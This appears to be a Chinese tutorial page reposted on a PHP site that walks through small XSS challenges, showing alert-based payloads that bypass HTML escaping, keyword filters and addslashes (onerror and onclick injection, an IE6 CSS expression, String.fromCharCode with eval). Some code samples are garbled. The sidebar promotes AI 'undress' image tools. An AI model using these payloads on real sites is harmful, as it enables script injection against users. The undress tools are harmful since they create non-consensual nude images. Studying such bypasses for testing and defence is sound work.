社区
学习
工具库
AI工具
休闲
搜索
简体中文
首页 运维 安全 xss的小测试是怎样进行的

xss的小测试是怎样进行的

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
May 19, 2023 am 11:37 AM
xss

  • 无安全方面的限制,直接使用

<script>alert(/xss/);</script>

  • 限制条件:只能使用CSS,不允许使用html标签

我们知道利用expression可以用来构造XSS,但是只能在IE下面测试,所以下面的测试请在IE6中执行。

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}
登录后复制

  • 限制条件:对HTML进行了转义,Image标签可用

测试输入的字符会被插入到src地址中,那么可以使用伪协议来绕过。

直接输入

alert( /xss/);
登录后复制

或者你也可以使用事件来绕过,注意闭合语句即可,如下:

1" onerror=alert(/xss/); var a="1

  • 限制条件:使用了关键字过滤。

我测试了一下,大部分都过滤了,有部分未过滤,经测试script/onerror过滤了,但是onclick未过滤,使用onclick事件绕过

<img src=# onclick=alert(/xss/);>
登录后复制

  • 限制条件:使用addslashes对特征字符进行了转义

也就是说我们的XSS语句中不能出现单引号,双引号等等特征字符。

直接使用

<script>alert(/xss/);</script>
登录后复制

即可绕过

或者使用String.fromCharCode方法,如下:

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>
登录后复制

以上是xss的小测试是怎样进行的的详细内容。更多信息请关注PHP中文网其他相关文章!

本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

热AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智能驱动的应用程序,用于创建逼真的裸体照片

AI Clothes Remover

AI Clothes Remover

用于从照片中去除衣服的在线人工智能工具。

Undress AI Tool

Undress AI Tool

免费脱衣服图片

Clothoff.io

Clothoff.io

AI脱衣机

AI Hentai Generator

AI Hentai Generator

免费生成ai无尽的。

显示更多

热门文章

R.E.P.O.能量晶体解释及其做什么(黄色晶体)
3 周前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最佳图形设置
3 周前 By 尊渡假赌尊渡假赌尊渡假赌
刺客信条阴影:贝壳谜语解决方案
2 周前 By DDD
R.E.P.O.如果您听不到任何人,如何修复音频
3 周前 By 尊渡假赌尊渡假赌尊渡假赌
WWE 2K25:如何解锁Myrise中的所有内容
4 周前 By 尊渡假赌尊渡假赌尊渡假赌
显示更多

热工具

记事本++7.3.1

记事本++7.3.1

好用且免费的代码编辑器

SublimeText3汉化版

SublimeText3汉化版

中文版,非常好用

禅工作室 13.0.1

禅工作室 13.0.1

功能强大的PHP集成开发环境

Dreamweaver CS6

Dreamweaver CS6

视觉化网页开发工具

SublimeText3 Mac版

SublimeText3 Mac版

神级代码编辑软件(SublimeText3)

显示更多

热门话题

gmail邮箱登陆入口在哪里
7478
15
CakePHP 教程
1377
52
steam的账户名称是什么格式
77
11
win11激活密钥永久
50
19
NYT连接提示和答案
19
33
显示更多
Related knowledge
Laravel中的跨站脚本攻击(XSS)和跨站请求伪造(CSRF)防护 Laravel中的跨站脚本攻击(XSS)和跨站请求伪造(CSRF)防护 Aug 13, 2023 pm 04:43 PM

Laravel中的跨站脚本攻击(XSS)和跨站请求伪造(CSRF)防护随着互联网的发展,网络安全问题也变得越来越严峻。其中,跨站脚本攻击(Cross-SiteScripting,XSS)和跨站请求伪造(Cross-SiteRequestForgery,CSRF)是最为常见的攻击手段之一。Laravel作为一款流行的PHP开发框架,为用户提供了多种安全机

PHP防御XSS与远程代码执行攻击的方法 PHP防御XSS与远程代码执行攻击的方法 Jun 30, 2023 am 08:04 AM

如何使用PHP防御跨站脚本(XSS)与远程代码执行攻击引言:在当今互联网世界中,安全性成为了一个至关重要的问题。XSS(跨站脚本攻击)和远程代码执行攻击是两种最常见的安全漏洞之一。本文将探讨如何使用PHP语言来防御这两种攻击,并提供几种方法和技巧来保护网站免受这些攻击的威胁。一、了解XSS攻击XSS攻击是指攻击者通过在网站上注入恶意脚本来获取用户的个人信息、

PHP和Vue.js开发安全性最佳实践:防止XSS攻击 PHP和Vue.js开发安全性最佳实践:防止XSS攻击 Jul 06, 2023 pm 01:37 PM

PHP和Vue.js开发安全性最佳实践:防止XSS攻击随着互联网的快速发展,网络安全问题变得越来越重要。其中,XSS(跨站脚本攻击)是一种非常常见的网络攻击类型,旨在利用网站的安全漏洞,向用户注入恶意代码或篡改网页内容。在PHP和Vue.js开发中,采取一些安全性最佳实践是非常重要的,以防止XSS攻击。本文将介绍一些常用的防止XSS攻击的方法,并提供相应的代

PHP中的安全XSS过滤技术解析 PHP中的安全XSS过滤技术解析 Jun 29, 2023 am 09:49 AM

PHP是一种广泛应用于网站开发的编程语言,但在使用PHP开发网站时,安全问题常常引起人们的担忧。其中之一就是跨网站脚本攻击(Cross-SiteScripting,XSS),是一种常见的网络安全漏洞。为了解决这个问题,PHP提供了一些安全XSS过滤技术。本文将介绍PHP中的安全XSS过滤技术的原理和使用方法。首先,我们需要了解什么是XSS攻击。XSS攻击

怎么分析反射型XSS 怎么分析反射型XSS May 13, 2023 pm 08:13 PM

1、反射型XSS反射型XSS是指应用程序通过Web请求获取不可信赖的数据,在未检验数据是否存在恶意代码的情况下,便将其传送给了Web用户。反射型XSS一般由攻击者构造带有恶意代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行,它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。小编以JAVA语言源代码为例,分析CWEID80:ImproperNeutralizationofScript-RelatedHTMLTagsinaWebPage(BasicXSS)2、

如何分析反射型XSS 如何分析反射型XSS Jun 03, 2023 pm 12:09 PM

1测试环境介绍测试环境为OWASP环境中的DVWA模块2测试说明XSS又叫CSS(CrossSiteScript),跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带攻击等等。利用该漏洞,攻击者可以劫持已通过验证的用户的会话。劫持到已验证的会话后,病毒发起者拥有该授权用户的所有权限。3测试步骤在输入框中输入javascrip脚本代码:al

PHP中的XSS攻击 PHP中的XSS攻击 May 23, 2023 am 09:10 AM

近年来,随着互联网信息技术的迅猛发展,我们的生活越来越离不开网络。而网络与我们日常生活的交互,离不开大量的代码编写、传输以及处理。而这些代码,需要我们保护它们安全,否则,恶意攻击者会利用它们发动各种攻击。其中的一种攻击就是XSS攻击。在本文中,我们将重点介绍PHP中的XSS攻击,并且给出相应的防御方法。一、XSS攻击概述XSS攻击,也称为跨站脚本攻击,通常是

PHP中的XSS攻击和防御指南 PHP中的XSS攻击和防御指南 May 22, 2023 pm 12:51 PM

PHP是一种常用的服务器端编程语言,广泛用于Web应用程序的开发。但是,由于它的普及和易用性,PHP也成为了攻击者攻击的目标之一。其中,最常见的攻击之一是跨站脚本攻击,简称为XSS。本文旨在介绍PHP中的XSS攻击及其防御指南。一、XSS攻击的定义跨站脚本攻击(XSS)是指攻击者通过“注入”恶意HTML或Javascript代码,以在用户的浏览器上执行恶意操

See all articles